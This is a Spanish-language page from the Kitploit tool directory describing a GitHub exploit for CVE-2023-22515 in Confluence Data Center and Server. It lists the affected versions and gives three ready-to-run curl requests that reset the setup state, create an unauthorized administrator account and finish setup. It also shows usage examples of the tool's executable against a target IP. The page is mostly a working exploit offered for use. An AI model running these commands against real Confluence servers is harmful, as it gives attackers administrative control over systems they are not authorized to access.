Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-22515 — Herramienta de explotación de vulnerabilidad para agregar usuarios administradores no autorizados en Confluence (CVE-2023-22515) | Kitploit
Herramientas/GitHubGitHub/ad-calcium/cve-2023-22515
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónRed Teaming
GitHubad-calcium/cve-2023-22515

CVE-2023-22515

Herramienta de explotación de vulnerabilidad para agregar usuarios administradores no autorizados en Confluence (CVE-2023-22515)

Ver Repositorio
11081hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de Red Team - Explotación de la vulnerabilidad CVE-2023-22515 para agregar administrador no autorizado en Confluence

Versiones afectadas

root@kitploit:~
8.0.0 <= Confluence Data Center and Confluence Server <= 8.0.4
8.1.0 <= Confluence Data Center and Confluence Server <= 8.1.4
8.2.0 <= Confluence Data Center and Confluence Server <= 8.2.3
8.3.0 <= Confluence Data Center and Confluence Server <= 8.3.2
8.4.0 <= Confluence Data Center and Confluence Server <= 8.4.2
8.5.0 <= Confluence Data Center and Confluence Server <= 8.5.1

Explotación

1. Acceso normal: indicar que la instalación ya está completa

root@kitploit:~
curl -vk http://IP/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false

2. Crear usuario administrador

root@kitploit:~
test123 Password2

Ejecute el siguiente comando

root@kitploit:~
curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=test123&fullName=test123&email=test123@localhost&password=Password2&confirm=Password2&setup-next-button=Next" http://IP/setup/setupadministrator.action

3. Finalizar configuración

root@kitploit:~
curl -vk -X POST -H "X-Atlassian-Token: no-check" http://IP/setup/finishsetup.action

Uso

root@kitploit:~
cve-2023-22515.exe
Usage of cve-2023-22515.exe:
  -pass string
        指定要添加的密码
  -proxy string
        设置代理
  -u string
        指定目标
  -user string
        指定要添加的用户名

Contraseña y usuario aleatorios

root@kitploit:~
cve-2023-22515.exe -u http://10.108.3.117:8090

image-2023101116485852

Agregar usuario administrador manualmente

root@kitploit:~
cve-2023-22515.exe -u http://10.108.3.117:8090 -user tesxe17 -pass Password2

image-20231011164858593

Registro de cambios

root@kitploit:~
[+] 2023/10/16 Añadido usuario y contraseña aleatorios

Star History

Star History Chart

Descargar herramienta